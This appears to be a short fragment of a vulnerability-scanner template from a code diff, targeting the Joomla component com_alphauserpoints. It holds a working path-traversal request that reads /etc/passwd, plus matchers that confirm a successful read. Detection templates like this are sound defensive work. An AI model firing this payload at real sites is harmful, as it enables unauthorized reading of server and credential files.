- "{{BaseURL}}/index.php?option=com_alphauserpoints&view=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

Some files were not shown because too many files have changed in this diff